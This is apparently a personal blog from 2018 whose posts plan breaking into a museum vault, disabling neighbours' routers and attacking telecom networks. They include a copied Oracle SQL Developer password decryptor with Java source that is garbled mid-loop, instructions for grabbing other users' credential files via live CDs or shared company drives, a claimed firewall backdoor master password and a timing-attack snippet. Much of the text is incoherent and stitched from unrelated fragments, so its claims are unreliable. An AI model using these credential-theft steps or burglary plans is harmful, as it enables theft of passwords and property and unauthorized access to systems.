Wednesday, December 12, 2018

summary...robbering


...after DCC loop frog juicer circuit is mounted...and let's focus on the primary goal, disable the magnetic alarm on the first 15 inches steel vault door...(so, we can...break in, using pneumatic high frequency bruteforce..vibrating screws...) ...and so...the circuit is...two channels into one channel only...(google the frog juicer diagram..) and then...connect to an android...and download this...so by writing on neibourg wifi devices...we can change the name..and disable their router..
https://www.microsoft.com/…/bluetooth-le-expl…/9n0ztkf1qd98…#
MICROSOFT.COM
Download this app from Microsoft Store for Windows 10, Windows 10 Mobile, HoloLens. See screenshots, read the latest customer reviews, and compare ratings for Bluetooth LE Explorer.

last call for today...remember that drill equipment for 15 inch steel iron...besides being bullshit, since they have seismic detectors...all old museum shit...either they have on the first security infra red detectors...ok...edit...door is open on the picture

Good morning! welcome back to war, tuesday, 06.20 am! ...First..the vault (s) like we can see on the photo has that magnetic bootrap alarm...so, even if we were the bomb squad that was no way to jamm with that density of concrete...so..let's take a look to the wall box of their alarm...and let's hv in consideration, that...we hv 10 years of tech evolution...so follow next posts

ok...request from new friends...yeah...you actually break security vaults by vibration technique..and you would open this animal...but again...they have seismic detectors...
GLOBAL DUAL ROLLER
HI-FREQUENCY VIBRATORS
Pneumatic GCL & GCD Series
http://www.globalmanufacturing.com/…/roller_v…/high_freq.asp

Saturday, December 8, 2018

ORACLE DB password decryptor

welcome back to war! saturday,06.55 am!
check it out:

In product-preferences.xml the other pieced of the needed information is found in the following tag:

With these two values and the following Java program, you're now able to decrypt the password:
java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f


Oracle SQL Developer password decryptor

Oracle SQL Developer allows a user to associate passwords with connections so that the user doesn't have to enter the password each time he opens a connection.
Of course, these passwords need to be stored somewhere. SQL developer stores them in an encrypted form, but it is possible to decrypt them.
In case of SQL developer version 4, two files are needed to find the information to encrypt these passwords. On Windows, these are
  • %APPDATA%\SQL Developer\system*\o.jdeveloper.db.connection*\connections.xml
  • %APPDATA%\SQL Developer\system*\o.sqldeveloper*\product-preferences.xml
%APPDATA% typically has a value of c:\user\username\AppData\Roaming)
In connections.xml, one piece of the needed information is found in the Contents tag:

   F35q3vdbVrI=

In product-preferences.xml the other pieced of the needed information is found in the following tag:

With these two values and the following Java program, you're now able to decrypt the password:
java Decrypt_V4 F35q3vdbVrI= 3e8efb59-8a5a-4c13-b1d5-ff64f987787f

Finding connections.xml and product-preferences.xml

As the two required files are found under %appdata%, they are typically unaccessible for other users.
However, there are at least two ways to access such files.

1. Using a Linux live CD

If you have physical access to the PC or laptop that has the connections.xml and product-preferences.xml and its harddisk is not encrypted, you can mount the PC harddisk with a Linux [live CD (such as Knoppix) and copy the necessary information

2. Using dir /s /b on the company drive

In many (big) companies, there is usually one or more »company drives« that all sorts of people and divisions or departments can store temporary files. Sometimes, database users backup theirconections.xml and product-preferences.xml on such drives.
Assuming this »company drive« is X:, then you can find these files in a cmd.exe window using
cd /d X:
dir /s /b connections.xml product-preferences.xml
You might also be lucky searching git or subversion repositories etc.

Source code (java)

// vi: ft=java

import java.security.MessageDigest;
import java.security.GeneralSecurityException;

import javax.crypto.Cipher;
import javax.crypto.spec.IvParameterSpec;
import javax.crypto.spec.SecretKeySpec;

import javax.xml.bind.DatatypeConverter;

//     Requires Java 8:
import java.util.Base64;


public class Decrypt_V4 {

  private static byte[] des_cbc_decrypt(
       byte[] encrypted_password,
       byte[] decryption_key,
       byte[] iv)
  throws GeneralSecurityException
  {

    Cipher cipher = Cipher.getInstance("DES/CBC/PKCS5Padding");
    cipher.init(Cipher.DECRYPT_MODE, new SecretKeySpec(decryption_key, "DES"), new IvParameterSpec(iv));
    return cipher.doFinal(encrypted_password);

  }

  private static byte[] decrypt_v4(
      byte[] encrypted,
      byte[] db_system_id)
  throws GeneralSecurityException
  {

    byte[] encrypted_password = Base64.getDecoder().decode(encrypted);

    byte[] salt = DatatypeConverter.parseHexBinary("051399429372e8ad");

 // key = db_system_id + salt
    byte[] key = new byte[db_system_id.length + salt.length];
    System.arraycopy(db_system_id, 0, key, 0, db_system_id.length);
    System.arraycopy(salt, 0, key, db_system_id.length, salt.length);


    java.security.MessageDigest md = java.security.MessageDigest.getInstance("MD5");
    for (int i=0; i<42 -="" 0="" 8="" argv="" byte="" catch="" db_system_id="" des_cbc_decrypt="" e.tostring="" e="" encrypted="argv[0].getBytes();" encrypted_password="" i="" iv="" key.length="" key="" main="" password="" pre="" public="" return="" secret_key="" static="" string="" system.arraycopy="" system.out.println="" tring="" try="" void="" x="" xception="">


Friday, December 7, 2018

...and this is the news...NSA firewall fortinet version 5.0.7 ...running...confirmed on twitter

master password for juniper OS from the US gov is :
" FGTAbc11*xy+Qqz27"

...and this is the news...NSA firewall fortinet version 5.0.7 ...running...confirmed on twitter

FORUM.FORTINET.COM
SSH Backdoor for FortiGate OS Version 4.x up to 5.0.7http://seclists.org/fulldisclosure/2016/Jan/26 I have not had a chance to try this. I don't see any threads discussing it. So, I thought I'd share. 

thank you Lord...vodafone FTTH network SIBS...take a look...timing attack...operator by operator...voilá


/*If pw == in returns 1, else returns 0 */
int compVar (char *pw, char *in) {
int i;
for (i=0; i<7 class="text_exposed_show" i="" span="" style="display: inline; font-family: inherit;">
if (pw[i]!=in[i]) {
return 0;
}
}
return 1;
}
int main(void) {
int comp=1;
char pw[]="secret";
char in[7];
int result;
scanf ("%s", in);
result = compVar(pw, in);
printf ("%d", result);
}

and....big cake, around here...(submarines cables national level..) Telvent Portugal, S.A.

and....big cake, around here...

ITCONIC.COM
Empresa global de servicios IT, líder en la gestión de Centros de Datos…